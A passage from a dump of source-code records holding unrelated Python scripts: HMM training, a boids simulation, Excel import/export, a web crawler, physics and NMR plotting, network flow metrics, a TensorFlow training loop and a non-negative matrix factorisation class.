{}\".format(i))\n train,test = data.get_fold(i)\n p = Probs(train,word_dict,tag_dict)\n\n # print(p.word_dict)\n # print(p.tag_dict,p.word_dict['.'],p.emmision_probs[31,13],p.transition_probs[0,:])\n pickle.dump(p,open(args.model,'wb'))\n\n\n","sub_path":"A1/170020016_170050107_170070015_Assignment1/HMM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"564152360","text":"#!/usr/bin/python2\nimport turtle\nimport math\nimport random\n \n'''\nREGLE 1 :\n- OBTENIR POSITION MOYENNE DE TOUT LES BOIDS : positionMoyenne()\n- CALCULER LE VECTEUR VITESSE BOID[i] VERS LA POSITION MOYENNE : AB : xB - xA, yB - yA : vecteurVitesse()\n- TRANSFORMER VITESSE EN ANGLE : speed2heading()\n'''\n\nboid=[] #tableau d'oiseaux\nN=4 #nombre de oiseau\n#zoneRepu = 3\n\n#REGLE 1\ndef positionMoyenne():\n sx=0\n sy=0\n x=0\n y=0\n for i in range(N):\n x, y = boid[i].position()\n sx += x\n sy += y\n return sx / N, sy / N\n\ndef vecteurVitesse( x, y, xposM, yposM ):\n return xposM - x, yposM - y\n\ndef speed2heading(x,y):\n return math.atan2(y,x)*57.17\n\n#REGLE 2\ndef angleMoyen():\n a = 0\n for i in range(N):\n a += boid[i].position()\n return a/N\n\n#regle 2\ndef regle2():\n theta = angleMoyen() / 57.17 #57,17 360 -> 2pi\n return math.cos(theta), math.sin(theta)\n\n\nposx=0;\nposy=0;\n\nfor i in range(N):\n boid.append(turtle.Turtle())\n\n#initialisation des parametres\nfor i in range(N):\n boid[i].penup() #ne pas tracer\n boid[i].setposition(random.randint(-100, 100), random.randint(-100, 100))\n boid[i].setheading(random.randint(0,359)) #angle de l'oiseau en degree\n boid[i].color(random.random(), random.random(), random.random())\n boid[i].pendown() #tracer deplacement\n\nwhile True:\n\n #regle 1 : tout les oiseaux vont au centre\n \n for i in range(N):\n posx, posy = positionMoyenne()\n posx, posy = vecteurVitesse( boid[i].xcor(), boid[i].ycor(), posx, posy)\n boid[i].setheading( speed2heading( posx, posy ) )\n boid[i].forward(1)\n\nraw_input()#attend que l'utilisateur frappe une touche pour quitter\n\n\n","sub_path":"TP1/tp1V1.py","file_name":"tp1V1.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"370249739","text":"from apogee.models import BayesianModel, DiscreteNaiveBayes\nimport apogee as ap\n\ndata = ap.random.random_array(1000, 10, seed=0)\nlabels = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\"]\nx = ap.vstack(([ap.encoding.discretise(data[:, i], 2) for i in range(10)])).T\n\n# build a Naive Bayes model\nnaive = DiscreteNaiveBayes()\nnaive.fit(x[:, 1:], x[:, 0], labels=labels)\n\n# build the equivalent Naive Bayes with the BayesianModel object\nb = BayesianModel()\nb.add(\"a\")\nfor i in range(1, 10):\n b.add(labels[i], parents=[\"a\"])\nb.fit(x, labels=labels, normed=True)\n\nfor i in range(100):\n n, f = (naive.predict([x[i][1:]]), b.predict(x[i][1:], labels[1:], \"a\")[\"a\"])\n print(n, f)\n\n","sub_path":"apogee/examples/bayes_to_naive_bayes.py","file_name":"bayes_to_naive_bayes.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"254596512","text":"from rest_framework.exceptions import ValidationError\nfrom django.http.response import HttpResponse\nimport itertools\nimport xlwt\nimport xlrd\n\n\ndef export_excel(data, name, fields):\n response = 
HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = f'attachment;filename={name}.xls'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet(name)\n \n # write the header row\n for col, field in enumerate(fields):\n ws.write(0, col, field[1])\n\n for row, item in enumerate(data):\n for col, field in enumerate(fields):\n ws.write(row + 1, col, item.get(field[0]))\n\n wb.save(response)\n return response\n\n\ndef import_excel(self, fields):\n file = self.request.FILES.get('file')\n\n if not file:\n raise ValidationError({'message': 'File not found'})\n\n wb = xlrd.open_workbook(file_contents=file.read())\n ws = wb.sheet_by_index(0)\n\n row_fields = [item[1][0] for item in itertools.product(ws.row_values(0), fields) if item[0] == item[1][1]]\n for row in range(1, ws.nrows):\n data = {item[0]: item[1] for item in zip(row_fields, ws.row_values(row)) if item[1] != ''}\n self.get_serializer(data=data).is_valid(raise_exception=True)\n yield data\n","sub_path":"utils/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"178450894","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 30 17:59:30 2018\n\n@author: steven\n\"\"\"\nfrom teacher_spider import url_manager\nfrom teacher_spider import html_downloader\nfrom teacher_spider import html_parser\nfrom teacher_spider import html_outputer\n\n\nclass SpiderMain(object):\n def __init__(self):\n self.urls=url_manager.UrlManager()\n self.downloader=html_downloader.HtmlDownloader()\n self.parser=html_parser.HtmlParser()\n self.outputer=html_outputer.HtmlOutputer()\n \n def craw(self,root_url):\n count=0\n self.urls.add_new_url(root_url)\n while self.urls.has_new_url():\n try:\n new_url=self.urls.get_new_url()\n # print('craw %d : %s'%(count,new_url))\n print('%d'%count)\n html_cont=self.downloader.download(new_url)\n new_urls,new_data=self.parser.parse(new_url,html_cont)\n self.urls.add_new_urls(new_urls)\n print(new_data['name'])\n print(new_data['paper1'])\n print(new_data['paper2'])\n print(new_data['paper3'])\n self.outputer.collect_data(new_data)\n if count==1000:\n break\n \n count=count+1\n except Exception:\n # a bare except here would also swallow KeyboardInterrupt\n print('craw failed')\n \n self.outputer.output_html()\n \n \nif __name__==\"__main__\":\n root_url=\"http://www.cs.tsinghua.edu.cn/publish/cs/4797/index.html\"\n obj_spider=SpiderMain()\n obj_spider.craw(root_url)","sub_path":"teacher_spider/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
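spider_main.py above drives a url_manager module that is not part of this record; a minimal sketch of the interface it relies on (add_new_url / add_new_urls / has_new_url / get_new_url), using two sets for de-duplication, could look like this:

class UrlManager(object):
    def __init__(self):
        self.new_urls = set()   # discovered but not yet crawled
        self.old_urls = set()   # already crawled

    def add_new_url(self, url):
        if url and url not in self.new_urls and url not in self.old_urls:
            self.new_urls.add(url)

    def add_new_urls(self, urls):
        for url in urls or []:
            self.add_new_url(url)

    def has_new_url(self):
        return len(self.new_urls) > 0

    def get_new_url(self):
        url = self.new_urls.pop()
        self.old_urls.add(url)
        return url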
+{"seq_id":"258816884","text":"import numpy as np\nimport pylab as pl\nimport time\nimport mod2011 as mod\nfrom scipy.integrate import odeint \nfrom numpy import fft\n\nt_start=time.time() # renamed from t0: get_stat() below also returns a t0, which shadowed the timer\npars=mod.get_params()\npars[\"f\"]=1000\n\ntf=10/pars[\"f\"]\nN=10000\nts=np.linspace(0,tf,N)\n\nh0, t0, n0, p0=mod.get_stat(pars, pars[\"PFDlight_0\"])\nX0=np.array([h0, n0, t0])\n\nsols=odeint(mod.get_sys, X0, ts, args=(pars,), hmax=0.001)\n\npfds=np.array([mod.get_PFD_osc(pars, t) for t in ts])\nF=mod.fluo_TS(pars, sols[:,1], pfds)\n\nLcos=np.cos(2*np.pi*pars[\"f\"]*ts)\nLsin=np.sin(2*np.pi*pars[\"f\"]*ts)\n\nFn=F-F.mean()\n\ncr=Fn@Lcos\nci=Fn@Lsin\n \nfs=N/tf\nSp=fft.fft(Fn)\nfreqs=fft.fftfreq(len(Fn))*fs \nax=pl.subplot(111)\nax.plot(freqs, np.abs(Sp))\nax.set_xlabel('Frequency in Hertz [Hz]')\nax.set_ylabel('Frequency Domain (Spectrum) Magnitude')\nax.set_xlim(-5*pars[\"f\"], 5*pars[\"f\"])\npl.savefig(\"fft%s.png\"%pars[\"f\"])\npl.clf()\namp=np.sqrt(cr**2+ci**2)\nph=np.arctan(ci/cr)\nprint(amp,ph)\n\npl.subplot(211)\npl.plot(ts,pfds)\npl.subplot(212)\npl.plot(ts,F)\npl.savefig(\"lala.png\")\n\nprint(time.time()-t_start)\n","sub_path":"ebenhoh2011_osc/osc.py","file_name":"osc.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"48679202","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import animation\n\nfig = plt.figure()\nax = Axes3D(fig)\n\ndef update_dot(num, dataLines, lines):\n for line, data in zip(lines, dataLines):\n line.set_data(data[0:2, num-1:num])\n line.set_3d_properties(data[2,num-1:num])\n return lines\n\ndef update(num, data, line):\n line.set_data(data[:2, :num])\n line.set_3d_properties(data[2, :num])\n\ndef gen1():\n phi = 10*np.pi/180\n a = 90*np.pi/180\n q = 1.9*pow(10, -19)\n B = 0.05\n m = 9.1*pow(10, -31)\n v = pow(10, 8)\n dt = 0.000000000001\n t = 0\n x, y, z = 0, m*v/(q*B), 0\n vx = v*np.sin(phi)*np.sin(a)+q*B*0*dt/(2*m)\n vy = 0-q*B*vx*dt*np.sin(a)/(2*m)\n vz = v*np.cos(phi)\n x += vx*dt\n y += vy*dt\n z += vz*dt\n c = 0\n while(c!=100000):\n c += 1\n vx0 = vx\n vx += q*B*vy*dt/m\n vy -= q*B*vx0*dt/m\n vz = vz\n x += vx*dt\n y += vy*dt\n z += vz*dt\n yield np.array([x, y, z])\ndef ani():\n N = 10000000\n data1 = np.array(list(gen1())).T\n line1, = ax.plot(data1[0, 0:1], data1[1, 0:1], data1[2, 0:1], color=\"blue\")\n\n ax.set_xlabel('X')\n ax.set_xlim3d([-0.01, 0.01])\n ax.set_ylabel('Y')\n ax.set_ylim3d([-0.01, 0.01])\n ax.set_zlabel('Z')\n ax.set_zlim3d([0, 1])\n\n ani = animation.FuncAnimation(fig, update, N, fargs=(data1, line1), interval=1)\n #ani.save('animation.gif', writer='imagemagick', fps=15)\n plt.show()\n\ndef main(): ani()\n \nif __name__ == \"__main__\": main()","sub_path":"fost/88.py","file_name":"88.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
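A quick analytic cross-check for the charged-particle animation in fost/88.py above (a sketch reusing the same constants as gen1(), not part of the original file): the helix traced by the Euler integration should have a circular cross-section of radius r = m*v_perp/(q*B) and a gyro-period that is independent of the speed.

import math

m, q, B = 9.1e-31, 1.9e-19, 0.05   # same mass, charge and field as gen1()
v, phi = 1e8, 10 * math.pi / 180
v_perp = v * math.sin(phi)          # with a = 90 deg, all of v*sin(phi) lies in the x-y plane
r_gyro = m * v_perp / (q * B)       # expected radius of the helix, roughly 1.7 mm here
T_gyro = 2 * math.pi * m / (q * B)  # gyro-period, independent of speed
print(f"gyro radius ~ {r_gyro:.3e} m, period ~ {T_gyro:.3e} s")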
0\n\telse:\n\t\tf1score = 2*rr*pr/(pr + rr)\n\treturn f1score\n\n\ndef banded_are_calc(realFlows, measuredFlows, lo_bound, hi_bound):\n\t'''\n\tCompute the average relative error of the measurement for flows whose length lies within the given range\n\t'''\n\tflows1 = get_banded_flows(realFlows, lo_bound, hi_bound)\n\tflows2 = get_banded_flows(measuredFlows, lo_bound, hi_bound)\n\t\n\t'''Calculate the Average Relative Error'''\n\tare = 0.0\n\tfor key, cnt in flows1.items():\n\t\ttemp = 0\n\t\tif key in flows2:\n\t\t\ttemp = flows2[key]\n\t\tare = are + abs(temp - cnt)/float(cnt)\n\tare = are/len(flows1)\n\treturn are\n\n\ndef get_rand_flow_id():\n\t\"\"\"Generate a random flow identifier\"\"\"\n\tlst = []\n\tfor i in range(8):\n\t\titem = random.randint(1, 255)\n\t\tlst.append(str(item))\n\tsrcip = \".\".join(lst[0:4])\n\tdstip = \".\".join(lst[4:8])\n\tproto = random.randint(1, 2)\n\tif 1 == proto:\n\t\tproto = \"6\"\n\telif 2 == proto:\n\t\tproto = \"17\"\n\tsrcport = str(random.randint(1, 65535))\n\tdstport = str(random.randint(1, 65535))\n\tpkt = {\"srcip\": srcip, \"dstip\": dstip, \"proto\": proto, \"srcport\": srcport, \"dstport\": dstport}\n\treturn pkt\n","sub_path":"network/flow_tools.py","file_name":"flow_tools.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"110142811","text":"from intcode import Intcode\nimport itertools\n\narray = [3,26,1001,26,-4,26,3,27,1002,27,2,27,1,27,26,\n27,4,27,1001,28,-1,28,1005,28,6,99,0,0,5]\n\nlistOfPhaseSettings = (list(itertools.permutations(range(5,10), 5)))\nprint(listOfPhaseSettings)\n\ndef runAmplifierSeries(phaseSettings):\n i = 0\n userInput = 0\n while i < 5:\n print(userInput)\n userInput = Intcode(array, userInput, phaseSettings[i])\n\n i += 1\n return userInput\n\n\nresult = [(runAmplifierSeries(settings), settings) for settings in listOfPhaseSettings]\n\nprint(max(result))\n","sub_path":"Day7/part 2/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"562086269","text":"import tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom time import time\r\nimport sys \r\nimport os\r\n\r\ntf.logging.set_verbosity(tf.logging.INFO)\r\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\r\n\r\nfrom utils.write_tfrecords import decode\r\nfrom models import star_model\r\nfrom utils import configurator, io_utils\r\n\r\ndef data_iterator(tfr_file, epoch=1):\r\n \"\"\" \"\"\"\r\n dataset = tf.data.TFRecordDataset(tfr_file)\r\n dataset = dataset.map(decode)\r\n # TODO: does this value make sense for buffer size?\r\n dataset = dataset.shuffle(1000)\r\n return dataset.make_initializable_iterator()\r\n\r\nif __name__==\"__main__\":\r\n import sys\r\n config_file = sys.argv[1]\r\n\r\n config = configurator.Configurator(config_file)\r\n beta = config.beta\r\n k = config.k\r\n epoch = config.num_epochs\r\n learning_rate = config.learning_rate\r\n \r\n train_tfr = config.train_tfr\r\n test_tfr = config.test_tfr\r\n\r\n # TODO: where do matrix dims go? 
config?\r\n star = star_model.StarModel(4, 16, k, beta)\r\n\r\n test_it = data_iterator(test_tfr)\r\n s,p,t = test_it.get_next()\r\n accuracy = star.accuracy(s,p,t)\r\n\r\n training_it = data_iterator(train_tfr,epoch=epoch)\r\n single, pair, truth = training_it.get_next()\r\n loss = star.loss(single, pair, truth)\r\n optimizer = tf.train.AdagradOptimizer(learning_rate)\r\n minimizer = optimizer.minimize(loss)\r\n\r\n #initialize_iter = initializable_iterator.initializer\r\n \r\n init_op = tf.global_variables_initializer()\r\n epoch_loss = []\r\n saver = tf.train.Saver()\r\n with tf.Session() as sess:\r\n sess.run(init_op)\r\n start_time = time()\r\n training_loss = []\r\n\r\n test_err = []\r\n for step in range(epoch):\r\n sess.run(training_it.initializer)\r\n epoch_loss = []\r\n while True:\r\n try:\r\n _, loss_val = sess.run([minimizer, loss])\r\n epoch_loss.append(loss_val)\r\n except tf.errors.OutOfRangeError:\r\n print('done', step)\r\n break\r\n\r\n training_loss.append(epoch_loss)\r\n\r\n epoch_test_err = []\r\n\r\n sess.run(test_it.initializer)\r\n while True:\r\n try:\r\n epoch_test_err.append(sess.run(accuracy))\r\n except tf.errors.OutOfRangeError:\r\n break \r\n test_err.append(sum(epoch_test_err)/float(len(epoch_test_err)))\r\n\r\n full_model_path = io_utils.model_path(config.model_name)\r\n saver.save(sess, full_model_path)\r\n print('train_time', time()-start_time)\r\n dataset_size = len(epoch_loss)\r\n average_of_per_epoch_training_loss = \\\r\n [sum(i)/dataset_size for i in training_loss]\r\n\r\n print(average_of_per_epoch_training_loss)\r\n print(test_err)\r\n\r\n io_utils.save_training_loss(config.model_name, average_of_per_epoch_training_loss)\r\n io_utils.save_test_err(config.model_name, test_err)\r\n\r\n #plt.plot(average_of_per_epoch_training_loss, label=\"train_err\")\r\n #plt.show()\r\n #plt.plot(test_err,label=\"test_err\")\r\n #plt.show()\r\n\r\n\r\n\r\n","sub_path":"python-src/globerson/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"356662700","text":"# -*- coding: utf-8 -*-\n\"\"\" GOOGLE FINANCE API wrapper \"\"\"\n\n\"\"\"\nAUTHOR: @jimako1989\nGITHUB: github.com/jimako1989/gfinance\nLICENSE: MIT\n\"\"\"\n\nimport os,requests,datetime\nimport pandas as pd\nimport numpy as np\nfrom bs4 import *\n\ndef get_data(currency,freq,period):\n # Arranging ohlc data.\n def split_line(string,basedate,timezone_shift,freq):\n list_str = string.split(',')\n if list_str[0][0]=='a': # The number after the 'a' is a Unix timestamp\n time = [datetime.datetime.fromtimestamp(int(list_str[0][1:])+int(timezone_shift)*60)]\n else: # The numbers without a leading 'a' are \"intervals\".\n time = [datetime.datetime.fromtimestamp(basedate+int(list_str[0])*int(freq)+int(timezone_shift)*60)]\n prices = list(map(float,list_str[1:]))\n return(np.array(time+prices))\n\n URL = 'http://www.google.com/finance/getprices?p='+period+'&f=d,h,o,l,c&i='+freq+'&q='+currency\n #print(\"Downloading from %s\"%URL)\n\n res = requests.get(URL)\n body = res.text.splitlines()\n timezone_shift, string_data = body[6][16:], body[7:]\n data = np.array([None]*5)\n basedate = int(body[7].split(',')[0][1:])\n\n for s in body[8:]:\n # To refresh 'basedate'.\n list_str = s.split(',')\n if list_str[0][0]=='a':\n basedate = int(list_str[0][1:])\n\n data = np.vstack((data,split_line(s,basedate,timezone_shift,freq)))\n data = data[1:]\n df = 
pd.DataFrame(data=data[:,1:],index=pd.to_datetime(data[:,0]),columns=body[4].split(',')[1:])\n return(df)\n","sub_path":"lib/gfinance.py","file_name":"gfinance.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"50276148","text":"import nmrglue\nimport pylab\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom scipy.ndimage import gaussian_filter\nimport numpy as np\nimport copy\nx = 165000 # remove noise level, change 200000\n\n# standard color scale\ncmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [(0, \"#ff0000\"), (0.005, \"#ff3333\"), (0.009, \"#ff4d4d\"),\n (0.045, \"#ffff80\"), (0.090, \"#ffff66\"), (0.15, \"#ffff4d\"),\n (0.20, \"#ffff33\"), (0.28, \"#99e699\"), (0.35, \"#85e085\"),\n (0.4, \"#00cc44\"), (0.55, \"#00b33c\"),\n (0.65, \"#8080ff\"), (0.82, \"#6666ff\"),\n (0.96, \"#3333ff\"), (1, \"#0000ff\")])\n#\n# cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [(0, \"#ff0000\"), (0.005, \"#ff3333\"), (0.009, \"#ff4d4d\"),\n# (0.035, \"#ffff80\"), (0.150, \"#ffff66\"), (0.2, \"#ffff4d\"),\n# (0.25, \"#ffff33\"), (0.38, \"#99e699\"), (0.52, \"#85e085\"),\n# (0.6, \"#00cc44\"), (0.65, \"#00b33c\"),\n# (0.7, \"#8080ff\"), (0.85, \"#6666ff\"),\n# (0.96, \"#3333ff\"), (1, \"#0000ff\")])\n#\n# cmap = matplotlib.colors.LinearSegmentedColormap.from_list(\"\", [\n# (0, \"#ff0000\"), (0.25, \"#ffff4d\"),\n# (0.5, \"#66ff66\"),\n# (0.75, \"#3333ff\"), (1, \"#0000ff\")])\n\n# get bruker data( create file \"test\", add all control and water-edited spectra)\ndef get_data():\n k = []\n j = 0\n t = []\n for i in [\"1000\", \"1001\", \"1002\", \"1003\", \"1004\", \"1005\",\"1006\",\"1007\"]:\n dic, data = nmrglue.fileio.bruker.read_pdata(dir=\"C:\\\\Bruker\\\\TopSpin4.0.6\\\\examdata\\\\test\\\\\" + i +\"\\\\pdata\\\\1\",\n bin_files=None, procs_files=None, read_procs=True, acqus_files=None,\n read_acqus=True, scale_data=True, shape=None, submatrix_shape=None,\n all_components=False, big=None, isfloat=None)\n if j % 2 == 0:\n t = []\n t.append(data)\n else:\n t.append(data)\n k.append(copy.deepcopy(t))\n j = j + 1\n return k\n\n# remove noise level, change 200000 as you wish\ndef set_data(lists):\n lists2 = []\n l = 0\n t = []\n for i in lists:\n for j in i:\n j = np.asarray(j)\n j[j < x] = 0\n if l % 2 == 0:\n t = []\n t.append(j)\n else:\n t.append(j)\n lists2.append(copy.deepcopy(t))\n l = l + 1\n return lists2\n\n# S/S0 ratio\ndef cal(S1_contl, S1_wtr):\n for key1, value1 in enumerate(S1_contl):\n for key2, val in enumerate(value1):\n try:\n if S1_contl[key1, key2] > 0:\n data3[key1, key2] = (S1_wtr[key1, key2] * 0.5/ S1_contl[key1, key2])\n # data3[key1, key2] = (S1_wtr[key1, key2] - S1_contl[key1, key2])\n else:\n data3[key1, key2] = 0\n except:\n data3[key1, key2] = 0\n return data3\n\ngraph_data = []\n\nfor S1_contl, S1_wtr in set_data(get_data()):\n plot = []\n data3 = np.copy(S1_wtr)\n data4 = cal(S1_contl, S1_wtr)\n\n # select area\n data5 = data4[2:431, 719:842] # for hydration map\n data6 = data4[381:817, 1028:1136]\n # data1 = data1[3:436, 708:866] # for contour lines\n print(np.max(data5))\n\n # data4 = data4/np.max(data4)\n\n\n for key1, value1 in enumerate(data4):\n for key2, val in enumerate(value1):\n if data4[key1, key2] > 1:\n data4[key1, key2] = 0.9936\n\n print(np.max(data5))\n\n # create contour\n cl = [0.0125 * 1.2 ** x for x in range(25)] # for hydration map\n cl2 = [0.01 * 2.4 ** x for x in range(10)] # for contour lines\n\n # noise 
cancellation\n data6 = gaussian_filter(data6, sigma=0.56) # for hydration map\n # data1 = gaussian_filter(data1, sigma=0.8) # for contour lines\n plot.append(copy.deepcopy(data5)) # for lignin region (only for plants)\n plot.append(copy.deepcopy(data6)) # for polysaccharide region\n graph_data.append(copy.deepcopy(plot))\n\nfig, axs = plt.subplots(nrows=len(graph_data), ncols=2, figsize=(4, 4), constrained_layout=True) # change ncols if you plot two regions\n\nfor i in range(len(graph_data)):\n for j in range(2):\n plt.axes(axs[i][j])\n clt = pylab.contourf(graph_data[i][j], cl, alpha=1,cmap=cmap) # for hydration map\n for c in clt.collections:\n c.set_edgecolor(\"face\")\n c.set_linewidth(0.000000001)\n\n\npylab.colorbar(cmap=\"cmap\")\n# cnt = pylab.contour(data1, cl2, alpha=0.1, colors=\"black\") # for contour lines\n\npylab.savefig(\"Hydration_plot.svg\")\npylab.show()\n","sub_path":"src/new3.py","file_name":"new3.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"463627132","text":"import numpy as np\n\n\ndef positive_projection(array):\n \"\"\"\n Returns a projection onto the positive orthant of a vector\n :param array:\n :return:\n \"\"\"\n return np.clip(array, a_min=0, a_max = None)\n\n\ndef fip(A, B):\n \"\"\"\n A helper function just to clean up some notation. Used in checking Armijo criterion for line search implementation\n :param A:\n :param B:\n :return:\n \"\"\"\n return A.flatten().dot(B.flatten())\n\n\nclass NMF:\n\n def __init__(self, data, k):\n self.X = np.array(data) # actual data matrix\n self.W = np.array(data > 0) # missing data indicator matrix\n self.k = k # number of hidden features\n self.m = data.shape[0]\n self.n = data.shape[1]\n self.A = np.matrix(np.zeros((self.m, self.k)))\n self.S = np.matrix(np.zeros((self.k, self.n)))\n self.norms = []\n self.scale = np.max(self.X.flatten())\n self.epsilon = 10e-6\n\n\n def f(self, A, S):\n \"\"\"\n Implements the objective function\n :param A: candidate A solution\n :param S: candidate S solution\n :return:\n \"\"\"\n return 1/2 * np.linalg.norm(self.W * (self.X - A@S)) ** 2\n\n def f_A(self, A, S):\n \"\"\"\n Implements the derivative w.r.t A of the objective function\n :param A:\n :param S:\n :return:\n \"\"\"\n return (self.W * (A@S))@S.T - (self.W * self.X)@S.T\n\n def f_S(self, A, S):\n \"\"\"\n Implements the derivative w.r.t. 
S of the objective function\n :param A:\n :param S:\n :return:\n \"\"\"\n return A.T@(self.W * (A@S)) - A.T@(self.W * self.X)\n\n\n def multiplicative_update(self, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n \"\"\"\n Implements a multiplicative update scheme for nonnegative matrix factorization\n :param max_iter: max number of iterations to complete\n :param verbose: number of iterations between print statements; if 0, does not print\n :param A_start: starting A matrix, can be useful for comparison purposes\n :param S_start: starting S matrix, can be useful for comparison purposes\n :return:\n \"\"\"\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"MU Iter: \", iter_, \"Norm: \", self.norms[-1])\n A = np.multiply(A, np.divide((self.W * self.X)@ S.T, (self.W * (A@S))@S.T + self.epsilon))\n S = np.multiply(S, np.divide(A.T @ (self.W * self.X), A.T@(self.W * (A@S)) + self.epsilon))\n # TODO: find a better programmatic way to do this\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def alternating_least_squares(self, max_iter=1000, verbose=10, tol=10e-6, A_start=None):\n \"\"\"\n Implements alternating least squares scheme\n :param max_iter:\n :param verbose:\n :param tol:\n :param A_start: starting value of A matrix, useful for comparison purposes\n :param pinv: defines whether to use psuedoinverses and projection to solve the nonnegative least squares subproblem,\n or to use the native scipy.optimize.nnls method.\n :return:\n \"\"\"\n\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n iter_ = 0\n while iter_ <= max_iter:\n S = positive_projection(np.linalg.pinv(A) @ self.X)\n A = positive_projection(self.X @ np.linalg.pinv(S))\n\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"ALS Iter: \", iter_, \"Norm: \", self.norms[-1])\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def hierarchical_alternating_least_squares(self, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n \"\"\"\n Implements alternating least squares scheme. 
This appears to be equivalent to the Rank-One Residue Iteration\n (RRI) update scheme.\n :param max_iter:\n :param verbose:\n :param tol:\n :param A_start: seed A matrix to start iterating with\n :param S_start: seed S matrix to start iterating with\n :return:\n \"\"\"\n\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"HALS Iter: \", iter_, \"Norm: \", self.norms[-1])\n for j in range(self.k):\n # need to be aware of division by 0\n A[:, j] = positive_projection(A[:, j] + ((self.X@S.T)[:, j] - A@((S@S.T)[:, j]))/((S@S.T)[j, j] + tol))\n S[j, :] = positive_projection(S[j, :] + ((self.X.T@A)[:, j] - S.T@((A.T@A)[:, j]))/((A.T@A)[j, j] + tol))\n\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def projected_gradient(self, alpha=.001, max_iter=1000, verbose=10, tol=10e-6, A_start=None, S_start=None):\n \"\"\"\n\n :param alpha: step size for a projected gradient approach\n :param max_iter:\n :param verbose:\n :param tol:\n :return:\n \"\"\"\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n iter_ = 0\n while iter_ <= max_iter:\n norm = self.f(A, S)\n self.norms.append(norm)\n if verbose and not iter_ % verbose:\n print(\"PG Iter: \", iter_, \"Norm: \", self.norms[-1])\n A = positive_projection(A - alpha * self.f_A(A, S))\n S = positive_projection(S - alpha * self.f_S(A, S))\n\n # other stopping condition\n if iter_ >= 2 and abs(self.norms[-1] - self.norms[-2]) <= tol:\n break\n\n iter_ += 1\n\n self.A = A\n self.S = S\n\n def line_search_projected_gradient(self, alpha=.001, beta=.1, sigma=0.01, max_iter=1000, verbose=10, tol=10e-6,\n A_start=None, S_start=None):\n \"\"\"\n Implements a backwards line search algorithm for choosing step size with gradient descent\n :param alpha1: step size for A descent\n :param alpha2: step size for S descent\n :param beta:\n :param sigma:\n :param max_iter:\n :param verbose:\n :param tol:\n :return:\n \"\"\"\n self.norms = []\n\n if A_start is not None:\n A = A_start\n else:\n A = np.random.uniform(self.epsilon, self.scale, size=(self.m, self.k))\n\n if S_start is not None:\n S = S_start\n else:\n S = np.random.uniform(self.epsilon, self.scale, size=(self.k, self.n))\n\n default_alpha = alpha\n iter_ = 0\n 